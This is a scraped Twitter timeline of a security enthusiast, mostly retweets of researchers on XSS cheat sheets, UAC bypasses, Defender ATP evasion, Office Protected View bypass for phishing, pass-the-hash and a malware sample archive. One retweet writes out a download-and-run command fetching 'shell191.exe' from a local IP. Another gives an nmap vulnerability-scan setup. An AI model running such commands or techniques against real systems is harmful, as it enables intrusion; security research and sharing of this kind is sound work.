Twitter | Pretraživanje | |
b00n
it took me 3 days in total and 32 reinstalls
125
Tweetovi
149
Pratim
22
Osobe koje vas prate
Tweetovi
b00n proslijedio/la je tweet
Xentropy 1. velj
I was tired of outdated XSS cheat sheets that don't touch on frameworks, html5, filter bypasses and other important stuff, so I made my own. I hope you find it as useful as I do. :)
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Reegun 28. sij
.exe is the new .exe  -   Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info -
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Dino A. Dai Zovi 26. sij
The claim in the FTI forensics report on Bezos’ iPhone that, “due to end-to-end encryption employed by WhatsApp, it is virtually impossible to decrypt the contents of the downloader [.enc file]...” bugged me so much that I coded up how to do it:
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
vx-underground 21. sij
Friends, It has come to our attention a company is selling our malware samples. VXUG will never charge for it's data. Our current collection boasts a healthy 443,703 samples. New blocks of 20,000 added weekly. Free of charge. No IP logs. No cookies.
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Kevin Beaumont 16. sij
There's a website for testing the NSA crypto thing, if you can open it without certificate warnings you may want to apply January 2020's Windows patches. Note this is difficult to scale for MITM interception due to number of systems it doesn't work on.
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Kevin Beaumont 9. sij
Some of the biggest and most costly breaches in recent memory caused by 20 year old security bugs in security products by security vendors: - Fortigate SSL VPN. - Citrix ADC (SSL VPN). - Pulse Secure (SSL VPN). In each case they all lacked basic security mitigations.
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Pixis 28. pro
New article about "Pass the hash" This technique is used in a lot of engagements, and yet it is not always fully understood. This is a little review of one of the most popular lateral movement techniques 🙃
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Captain Banana 🌱 1. sij
New year, new merch - shipped with every radare2 pro license. Be like and get yours now!
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Carroll 30. pro
look at that Seniority level:
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
vx-underground 27. pro
Friends, In the past 30 days we have: -Consumed just over 3TBs of web traffic -Ducked 3 DDoS attacks -Gotten over 600 new followers -Added approx. 20,000 malware samples -4 Papers -1 full ezine -Made 'impressions' on over 251,000 people -Grown 2020 will be a good year for VX.
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
PortSwigger Research 9. pro
Breaking the chains on HTTP Request Smuggler, by
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
sailay(valen) 8. pro
you can UAC bypass all executable files which are autoelevate true base on my first article. UAC Bypass All the things POCs: sample: Bluetooth uninstall device task (UAC Bypass to administrator)
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
b4rtik 2. pro
A little research from and me on how to evade WinDefender ATP credential-theft
Reply Retweet Označi sa "sviđa mi se"
b00n 3. pro
thx for the great training!
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
grant 30. stu
Spotify: hey dumbass. hey asshole. Me: pls don’t Spotify: here’s your 2019 Rewind playlist you bitch Me: stop Spotify: and we pulled every fucken song from that one 6 week period after a breakup Me: *already listening to the playlist, crying* it’s perfect. i hate you.
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Somdev Sangwan 28. stu
Check if a server is running any vulnerable services wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb All done, now you can do a scan with nmap -sV --script vulners <target>
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
A hacker's life 26. stu
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Nir Yehoshua 25. stu
Want to classify process injection by Windows API calls? Check out the new poster made by and me!
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
𝐂𝐮𝐫𝐭𝐢𝐬 𝐁𝐫𝐚𝐳𝐳𝐞𝐥𝐥 19. stu
Well, since didn't find my bug report to be worth rewarding or fixing anytime soon, I figured I'd drop the blog. Hoping Red Teams can enjoy using this technique to bypass Protected View in Office documents! 📄🎣
Reply Retweet Označi sa "sviđa mi se"
b00n proslijedio/la je tweet
Emad Shanab 4. stu
Reply Retweet Označi sa "sviđa mi se"